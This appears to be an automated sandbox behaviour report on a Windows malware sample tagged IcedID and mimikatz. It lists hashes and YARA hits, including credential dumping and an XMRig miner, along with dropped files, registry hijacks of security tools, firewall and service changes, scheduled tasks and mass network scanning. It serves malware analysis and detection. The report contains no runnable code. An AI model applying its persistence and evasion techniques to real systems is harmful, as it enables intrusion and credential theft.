Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
09-04-2024 23:21
Behavioral task
behavioral1
Sample
2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe
-
Size
8.6MB
-
MD5
1d19798d7ceeca210b1367ec7eb96ba2
-
SHA1
b09268d441d351fc04d5dac38d20f094dd537d3e
-
SHA256
055f3b570987fda9ecf3c37e7e59e153474fdbf02c9318ef7b29628b42f209ea
-
SHA512
09cefa98ca338a62f8841ba94edd734ed769bc32bf88764da7855a0aa54c01cd3e9ee5236bee97610c26187f18db21d0ca43e5e61d2ad309b386302557424995
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
euikgtl.exedescription pid process target process PID 3516 created 2128 3516 euikgtl.exe spoolsv.exe -
Contacts a large (30798) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4512-136-0x00007FF6310E0000-0x00007FF6311CE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 39 IoCs
Processes:
resource yara_rule behavioral2/memory/4028-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX C:\Windows\itspapsg\euikgtl.exe UPX behavioral2/memory/2748-7-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/4512-135-0x00007FF6310E0000-0x00007FF6311CE000-memory.dmp UPX C:\Windows\lubbeisit\Corporate\vfshost.exe UPX behavioral2/memory/4512-136-0x00007FF6310E0000-0x00007FF6311CE000-memory.dmp UPX C:\Windows\Temp\lubbeisit\jgqtbilab.exe UPX behavioral2/memory/4344-140-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/4344-146-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX C:\Windows\Temp\tskqpisje\cktkgb.exe UPX behavioral2/memory/4752-161-0x00007FF711530000-0x00007FF711650000-memory.dmp UPX behavioral2/memory/872-171-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/1704-175-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/2548-179-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/4752-182-0x00007FF711530000-0x00007FF711650000-memory.dmp UPX behavioral2/memory/2768-184-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/3748-189-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/2900-193-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/3104-197-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/4752-200-0x00007FF711530000-0x00007FF711650000-memory.dmp UPX behavioral2/memory/4044-202-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/4728-206-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/3008-210-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/4752-212-0x00007FF711530000-0x00007FF711650000-memory.dmp UPX behavioral2/memory/1228-219-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/4972-223-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/4752-226-0x00007FF711530000-0x00007FF711650000-memory.dmp UPX behavioral2/memory/4692-228-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/4584-231-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/2904-233-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/4752-234-0x00007FF711530000-0x00007FF711650000-memory.dmp UPX behavioral2/memory/2100-235-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/2100-237-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp UPX behavioral2/memory/4752-248-0x00007FF711530000-0x00007FF711650000-memory.dmp UPX behavioral2/memory/4752-249-0x00007FF711530000-0x00007FF711650000-memory.dmp UPX behavioral2/memory/4752-250-0x00007FF711530000-0x00007FF711650000-memory.dmp UPX behavioral2/memory/4752-253-0x00007FF711530000-0x00007FF711650000-memory.dmp UPX behavioral2/memory/4752-255-0x00007FF711530000-0x00007FF711650000-memory.dmp UPX behavioral2/memory/4752-256-0x00007FF711530000-0x00007FF711650000-memory.dmp UPX -
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/4752-182-0x00007FF711530000-0x00007FF711650000-memory.dmp xmrig behavioral2/memory/4752-200-0x00007FF711530000-0x00007FF711650000-memory.dmp xmrig behavioral2/memory/4752-212-0x00007FF711530000-0x00007FF711650000-memory.dmp xmrig behavioral2/memory/4752-226-0x00007FF711530000-0x00007FF711650000-memory.dmp xmrig behavioral2/memory/4752-234-0x00007FF711530000-0x00007FF711650000-memory.dmp xmrig behavioral2/memory/4752-248-0x00007FF711530000-0x00007FF711650000-memory.dmp xmrig behavioral2/memory/4752-249-0x00007FF711530000-0x00007FF711650000-memory.dmp xmrig behavioral2/memory/4752-250-0x00007FF711530000-0x00007FF711650000-memory.dmp xmrig behavioral2/memory/4752-253-0x00007FF711530000-0x00007FF711650000-memory.dmp xmrig behavioral2/memory/4752-255-0x00007FF711530000-0x00007FF711650000-memory.dmp xmrig behavioral2/memory/4752-256-0x00007FF711530000-0x00007FF711650000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
resource yara_rule behavioral2/memory/4028-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz C:\Windows\itspapsg\euikgtl.exe mimikatz behavioral2/memory/2748-7-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4512-136-0x00007FF6310E0000-0x00007FF6311CE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
euikgtl.exewpcap.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts euikgtl.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts euikgtl.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 3060 netsh.exe 3720 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
euikgtl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe euikgtl.exe -
Executes dropped EXE 28 IoCs
Processes:
euikgtl.exeeuikgtl.exewpcap.exebqalurljg.exevfshost.exejgqtbilab.exexohudmc.exenslfoo.execktkgb.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exeeuikgtl.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exenstjgbafp.exeeuikgtl.exepid process 2748 euikgtl.exe 3516 euikgtl.exe 1448 wpcap.exe 2512 bqalurljg.exe 4512 vfshost.exe 4344 jgqtbilab.exe 4256 xohudmc.exe 1360 nslfoo.exe 4752 cktkgb.exe 872 jgqtbilab.exe 1704 jgqtbilab.exe 2548 jgqtbilab.exe 2768 jgqtbilab.exe 3748 jgqtbilab.exe 2900 jgqtbilab.exe 3104 jgqtbilab.exe 4044 jgqtbilab.exe 4728 jgqtbilab.exe 3008 jgqtbilab.exe 3588 euikgtl.exe 1228 jgqtbilab.exe 4972 jgqtbilab.exe 4692 jgqtbilab.exe 4584 jgqtbilab.exe 2904 jgqtbilab.exe 2100 jgqtbilab.exe 3556 nstjgbafp.exe 6000 euikgtl.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exebqalurljg.exepid process 1448 wpcap.exe 1448 wpcap.exe 1448 wpcap.exe 1448 wpcap.exe 1448 wpcap.exe 1448 wpcap.exe 1448 wpcap.exe 1448 wpcap.exe 1448 wpcap.exe 2512 bqalurljg.exe 2512 bqalurljg.exe 2512 bqalurljg.exe -
Processes:
resource yara_rule behavioral2/memory/4512-135-0x00007FF6310E0000-0x00007FF6311CE000-memory.dmp upx C:\Windows\lubbeisit\Corporate\vfshost.exe upx behavioral2/memory/4512-136-0x00007FF6310E0000-0x00007FF6311CE000-memory.dmp upx C:\Windows\Temp\lubbeisit\jgqtbilab.exe upx behavioral2/memory/4344-140-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/4344-146-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx C:\Windows\Temp\tskqpisje\cktkgb.exe upx behavioral2/memory/4752-161-0x00007FF711530000-0x00007FF711650000-memory.dmp upx behavioral2/memory/872-171-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/1704-175-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/2548-179-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/4752-182-0x00007FF711530000-0x00007FF711650000-memory.dmp upx behavioral2/memory/2768-184-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/3748-189-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/2900-193-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/3104-197-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/4752-200-0x00007FF711530000-0x00007FF711650000-memory.dmp upx behavioral2/memory/4044-202-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/4728-206-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/3008-210-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/4752-212-0x00007FF711530000-0x00007FF711650000-memory.dmp upx behavioral2/memory/1228-219-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/4972-223-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/4752-226-0x00007FF711530000-0x00007FF711650000-memory.dmp upx behavioral2/memory/4692-228-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/4584-231-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/2904-233-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/4752-234-0x00007FF711530000-0x00007FF711650000-memory.dmp upx behavioral2/memory/2100-235-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/2100-237-0x00007FF74AA10000-0x00007FF74AA6B000-memory.dmp upx behavioral2/memory/4752-248-0x00007FF711530000-0x00007FF711650000-memory.dmp upx behavioral2/memory/4752-249-0x00007FF711530000-0x00007FF711650000-memory.dmp upx behavioral2/memory/4752-250-0x00007FF711530000-0x00007FF711650000-memory.dmp upx behavioral2/memory/4752-253-0x00007FF711530000-0x00007FF711650000-memory.dmp upx behavioral2/memory/4752-255-0x00007FF711530000-0x00007FF711650000-memory.dmp upx behavioral2/memory/4752-256-0x00007FF711530000-0x00007FF711650000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 63 ifconfig.me 65 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
wpcap.exexohudmc.exeeuikgtl.exedescription ioc process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\nslfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A euikgtl.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 euikgtl.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\nslfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content euikgtl.exe -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
euikgtl.exe2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exenstjgbafp.execmd.exedescription ioc process File created C:\Windows\lubbeisit\UnattendGC\specials\trfo-2.dll euikgtl.exe File created C:\Windows\itspapsg\docmicfg.xml euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\AppCapture64.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\AppCapture32.dll euikgtl.exe File created C:\Windows\itspapsg\euikgtl.exe 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe File created C:\Windows\lubbeisit\abkgigiey\Packet.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\coli-0.dll euikgtl.exe File created C:\Windows\itspapsg\schoedcl.xml euikgtl.exe File created C:\Windows\lubbeisit\upbdrjv\swrpwe.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\exma-1.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\libxml2.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\posh-0.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\docmicfg.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\docmicfg.xml euikgtl.exe File opened for modification C:\Windows\lubbeisit\abkgigiey\Packet.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\cnli-1.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\svschost.xml euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\spoolsrv.xml euikgtl.exe File created C:\Windows\itspapsg\svschost.xml euikgtl.exe File opened for modification C:\Windows\itspapsg\spoolsrv.xml euikgtl.exe File opened for modification C:\Windows\itspapsg\vimpcsvc.xml euikgtl.exe File opened for modification C:\Windows\lubbeisit\abkgigiey\Result.txt nstjgbafp.exe File created C:\Windows\lubbeisit\UnattendGC\specials\trch-1.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\svschost.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\vimpcsvc.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\vimpcsvc.xml euikgtl.exe File opened for modification C:\Windows\lubbeisit\Corporate\log.txt cmd.exe File created C:\Windows\lubbeisit\abkgigiey\scan.bat euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\crli-0.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\tibe-2.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\schoedcl.xml euikgtl.exe File created C:\Windows\lubbeisit\abkgigiey\nstjgbafp.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\vimpcsvc.xml euikgtl.exe File created C:\Windows\ime\euikgtl.exe euikgtl.exe File created C:\Windows\lubbeisit\abkgigiey\ip.txt euikgtl.exe File created C:\Windows\lubbeisit\abkgigiey\wpcap.exe euikgtl.exe File created C:\Windows\lubbeisit\abkgigiey\wpcap.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\schoedcl.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\schoedcl.xml euikgtl.exe File opened for modification C:\Windows\itspapsg\svschost.xml euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\libeay32.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\ssleay32.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\spoolsrv.xml euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\docmicfg.xml euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\Shellcode.ini euikgtl.exe File created C:\Windows\lubbeisit\Corporate\mimidrv.sys euikgtl.exe File created C:\Windows\lubbeisit\Corporate\mimilib.dll euikgtl.exe File opened for modification C:\Windows\itspapsg\euikgtl.exe 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe File created C:\Windows\lubbeisit\UnattendGC\specials\zlib1.dll euikgtl.exe File created C:\Windows\itspapsg\vimpcsvc.xml euikgtl.exe File created C:\Windows\lubbeisit\abkgigiey\bqalurljg.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\xdvl-0.dll euikgtl.exe File opened for modification C:\Windows\itspapsg\docmicfg.xml euikgtl.exe File opened for modification C:\Windows\itspapsg\schoedcl.xml euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\svschost.xml euikgtl.exe File created C:\Windows\itspapsg\spoolsrv.xml euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\tucl-1.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\ucl.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\spoolsrv.exe euikgtl.exe File created C:\Windows\lubbeisit\Corporate\vfshost.exe euikgtl.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 2100 sc.exe 4604 sc.exe 3876 sc.exe 2576 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
resource yara_rule C:\Windows\itspapsg\euikgtl.exe nsis_installer_2 C:\Windows\lubbeisit\abkgigiey\wpcap.exe nsis_installer_1 C:\Windows\lubbeisit\abkgigiey\wpcap.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 1392 schtasks.exe 2856 schtasks.exe 4492 schtasks.exe -
Modifies data under HKEY_USERS 43 IoCs
Processes:
jgqtbilab.exejgqtbilab.exejgqtbilab.exeeuikgtl.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing euikgtl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" euikgtl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" euikgtl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" euikgtl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created 